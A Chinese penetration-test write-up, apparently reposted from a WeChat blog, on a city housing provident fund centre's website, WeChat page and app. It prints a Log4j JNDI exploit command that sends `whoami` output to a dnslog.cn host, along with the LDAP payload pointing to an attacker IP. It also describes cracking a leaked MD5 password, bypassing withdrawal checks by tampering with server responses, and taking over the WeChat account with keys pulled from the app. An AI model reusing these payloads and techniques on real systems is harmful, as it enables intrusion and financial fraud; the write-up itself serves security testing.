记一次某市公积金管理中心渗透测试

0x01 题外话

公积金这三个字上学的时候对我来说就是高高在上的棺老爷，找工作的时候是衡量工作好坏的一个因素，不管是五险一金还是七险两金，工作的时候是甲方爸爸，是不管吃住屁事很多周末加班的甲方爸爸。

主页上去就是个登录窗口，说干就干，开始行动，先随便登录一下试试，再抓个包看看：

又是熟悉的rememberme，难道说刚上班就要下班了？直接上工具

主站感觉有东西可以交差了，又去看了一下其他的方向，有一个测试的微信公众号，发过来个链接，也是类似的登陆界面，刚才测试已经是打不开了，可能这就是修复了吧。

也是一样的思路，先随便登陆一下，burp各种插件都过一遍，不得不说，f0神插件可真是太好用了，（https://github.com/f0ng/log4j2burpscanner）ceye后台也很快能看到记录，但是好像没有什么危害，于是决定来外带一下。

java -jar "/root/JNDI-Injection-Exploit-1.0-SNAPSHOT-all (1).jar" -C "ping `whoami`.xxxxxx.dnslog.cn" -A "12x.22x.2x.63"生成payload：${jndi:ldap://12x.2x.2x.6x:1389/fxxxxx}

别问为什么没有后续，因为死活都弹不出来shell，不过也没办法，菜鸡是这样的。

其实上边这些工作量不多，一会就搞完了，但也不能说我们就回去了吧。框架搞完了，连系统都还没登进去呢，还是差点意思，于是又开始从登录口开始尝试：

当然现在这个洞已经修复了，当用户输入一个不存在的用户时会提示没有注册，这就存在一个用户名枚举的问题，不过考虑到waf的存在，二十次就封禁了，所以客户也没什么反应。

重点来了，就在画红框的地方本来会返回一串神秘代码，刚开始没在意，但越看越熟悉，于是找了个在线网站，somd5比cmd5可好太多了，不吹不黑，于是就这样了。。

姓名缩写加数字，很爱，很愉快，我还是第一次碰见返回密码，还能破解出来的，听说你不知道密码？那我告诉你呀！

经过上边的弱口令，愉快的进入了系统，上来我先看余额

还不错，跟我差不多，忘了说了，公积金关键时刻还是能救济的，去年有一阵差点交不起房租，不过有个坏处就是一年只能提一次。好了，说回来，他这个加密可真是加密了寂寞。前端星号是加上了，返回的包里啥都看见了，这开发拿去祭天都不可惜。

接下来是几个几个功能点都点了一遍，千疮百孔都不过分，如果真要我写修复建议的话，那我的建议是换一家公司来做吧。由于槽点太多，这里只拿其中一个模块来举例子，那就是取钱吧，毕竟谁不喜欢钱呢。

点击我要取钱，可以看到这个页面，大概分五个流程，选择提取类型，信息录入，身份验证，数据提交，最后办理成功。首先是选择提取类型，因为每种提取都是有不同的限制条件和流程的，且同一种类型的提取只能申请一次，要不然就会这样。

看了一下返回包，奇怪的code:"-1映入眼帘，于是尝试修改返回包来进行绕过。

{"code":0,"message":"您不是封存状态不能办理此项业务，谢谢！","dataset":{"total":0,"rows":[]},"fileMap":null}

然后点击forward，打开浏览器。

成功进入下一步。

点击下一步，报错，还是同样的思路，抓包，拦截，改包，突破。

{"code":0,"message":"【境外身份证件】必须收件！ 请在【境外永久居留证件,户口注销证明】之中选择1种类型进行收件！","dataset":{"total":0,"rows":[]},"fileMap":null}

后边几个功能点都是这样的操作，甚至提取银行卡这一步还能修改银行卡号，我有了一些大胆的想法。

其他类似功能都有这种操作，不过没劲，这个开发我真是佩服你，你的逻辑是真怪啊。这个系统也就这些功能了，也没什么上传点，只有各种查询而已，最后就剩一个app了。

关于app的动态测试接触的比较少，也就只是抓包这些，功能点都是些类似的，也没有仔细研究。主要是静态扫描了，这里推荐一下腾讯的金刚，还挺不错的，也很快，很专业（https://service.security.tencent.com/kingkong）。

传上去等一会就可以看报告了，这里没扫出来什么东西，于是开始研究本地测试。这里主要是分两种方法，第一种使用apktool，直接可以编译出apk文件的资源文件，可以提取一些图片布局，这里通过替换一些文件来检测app是否有完整性校验的功能。

第二种更加实用一些，使用dex2jar可以将apk文件编译成dex文件。

再用jd-jui来打开，可以看到系统源代码。

可以通过类名来查看是否使用了代码混淆，这对于代码审计是一件很头疼的事。于是搜索一些相关的关键词。

于是从最底下找到了微信的key和id，那么这玩意有什么用呢，让我们打开一下这个网站。https://mp.weixin.qq.com/debug/。

通过测试平台拿到了微信公众号的token值，从而接管微信公众号 可以做发消息等高危操作！

愉（tong）快（ku）的周末假期就这样没了，好久没周末加班了，希望这周末好好睡一觉，再也不用去那个该死的地方了，天天九点出门上班真好啊！

原文始发于微信公众号（九八纪）：记一次某市公积金管理中心渗透测试